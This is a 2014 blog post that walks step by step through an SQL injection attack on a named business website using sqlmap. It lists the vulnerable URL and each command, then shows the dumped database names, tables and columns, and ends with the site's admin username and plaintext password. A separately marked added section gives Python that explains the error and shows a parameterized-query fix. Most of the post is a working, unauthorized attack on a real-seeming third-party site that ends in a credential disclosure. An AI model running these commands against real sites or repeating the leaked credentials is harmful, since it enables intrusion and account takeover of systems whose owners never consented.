Thursday 20 February 2014

SQL injection with SQLMAP Tool

SQLMAP-->

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


First, search for the vulnerability in the target website.

target-->www.tsbuttons.com.bd 

Now find the SQL injection vulnerability in the target website.
ohh I found it....
vulnerability-->tsbuttons.com.bd/jean_tack_buttons.php?ptid=20'


This is the error shown on the website:
---------------------------------------------
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
---------------------------------------------
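
Why a single trailing quote produces an error like this, and what the fix looks like, as an added example that is not part of the original post or the site's code. Assumptions: the page builds its query by concatenating ptid into the SQL text, the table layout and function names are hypothetical, and Python's sqlite3 stands in for the MySQL server.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data; sqlite3 stands in for the site's MySQL server."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, ptid INTEGER, name TEXT)")
    db.executemany("INSERT INTO product (ptid, name) VALUES (?, ?)",
                   [(20, "jean tack button A"), (20, "jean tack button B"),
                    (21, "snap button")])
    return db

def products_vulnerable(db, ptid):
    """Assumed shape of the flawed page code: the parameter is pasted into the SQL text."""
    query = "SELECT name FROM product WHERE ptid = " + ptid + " ORDER BY id"
    return [row[0] for row in db.execute(query)]

def products_hardened(db, ptid):
    """Validate the type first, then bind the value so it never becomes SQL syntax."""
    if not re.fullmatch(r"[0-9]{1,9}", ptid):
        raise ValueError("ptid must be a small non-negative integer")
    query = "SELECT name FROM product WHERE ptid = ? ORDER BY id"
    return [row[0] for row in db.execute(query, (int(ptid),))]

def probe(func, ptid):
    """Classify the outcome the way the web tier would see it."""
    db = make_db()
    try:
        return ("rows", func(db, ptid))
    except sqlite3.Error as exc:
        return ("sql-error", str(exc))  # the database parsed request input as SQL
    except ValueError as exc:
        return ("rejected", str(exc))   # input refused before reaching the database

if __name__ == "__main__":
    for value in ("20", "20'"):
        print(repr(value), "vulnerable:", probe(products_vulnerable, value))
        print(repr(value), "hardened:  ", probe(products_hardened, value))
```

A database syntax error that reaches the browser, as in the message above, also tells the visitor which database engine is in use, so the hardened path should return a generic error page and log the detail server-side.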

Now start the game (hack the target site).

1. Open sqlmap

root@kali:~# sqlmap --help





2. Find out the database name of the target website

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 --dbs



output is
----------------------------------------
available databases [2]:
[*] information_schema
[*] tsbutton_db
---------------------------------------


3. Access the tables of the database

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db --tables



output is
--------------------------------------------------------------------------------------------------------
[23:29:38] [INFO] fetching tables for database: 'tsbutton_db'
Database: tsbutton_db
[4 tables]
+--------------+
| news         |
| product      |
| product_type |
| users        |
+--------------+
---------------------------------------------------------------------------------------------------------

4. Now it is time to access the columns of the tables we fetched from the database

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users --columns




output is
--------------------------------------------------------
Database: tsbutton_db
Table: users
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| name     | varchar(25)  |
| Password | varchar(255) |
| type     | int(4)       |
| userid   | int(25)      |
| username | varchar(25)  |
+----------+--------------+
-------------------------------------------------------


5. Access the username


root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C username --dump



Yeah,
we get the username of the target website
username-->admin


6. Let's access the password

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C password --dump




Finally, the game is over.

--------------------------------------------------------------
username-->admin
password-->water
-------------------------------------------------------------